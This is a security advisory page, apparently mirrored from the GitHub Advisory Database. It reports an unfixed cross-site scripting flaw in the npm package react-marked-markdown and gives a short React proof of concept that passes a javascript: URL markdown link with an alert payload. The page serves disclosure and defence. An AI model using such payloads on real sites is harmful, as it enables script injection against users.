Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLW03cW0tcjJyNS1mNzdx
Cross-Site Scripting in react-marked-markdown
All versions of react-marked-markdown are vulnerable to cross-site scripting (XSS) via href attributes. This is exploitable if user is provided to react-marked-markdown
Proof of concept:
import React from 'react'
import ReactDOM from 'react-dom'
import { MarkdownPreview } from 'react-marked-markdown'
ReactDOM.render(
<MarkdownPreview
markedOptions={{ sanitize: true }}
value={'[XSS](javascript: alert`1`)'}
/>,
document.getElementById('root')
)
Recommendation
No fix is currently available for this vulnerability. It is our recommendation to not install or use this module at this time if you allow user input into href values.
Permalink: https://github.com/advisories/GHSA-m7qm-r2r5-f77qJSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLW03cW0tcjJyNS1mNzdx
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 4 years ago
Updated: about 2 years ago
Identifiers: GHSA-m7qm-r2r5-f77q
References:
- https://github.com/Vincent-P/react-marked-markdown/issues/61
- https://hackerone.com/reports/344069
- https://www.npmjs.com/advisories/668
- https://github.com/advisories/GHSA-m7qm-r2r5-f77q
Blast Radius: 0.0
Affected Packages
npm:react-marked-markdown
Dependent packages: 20Dependent repositories: 55
Downloads: 714 last month
Affected Version Ranges: >= 0.0.0
No known fixed version
All affected versions: 0.1.0, 0.1.1, 1.0.0, 1.0.1, 1.0.2, 1.1.0, 1.1.1, 1.2.1, 1.2.2, 1.3.2, 1.3.3, 1.3.4, 1.3.5, 1.3.6, 1.4.0, 1.4.1, 1.4.2, 1.4.3, 1.4.4, 1.4.5, 1.4.6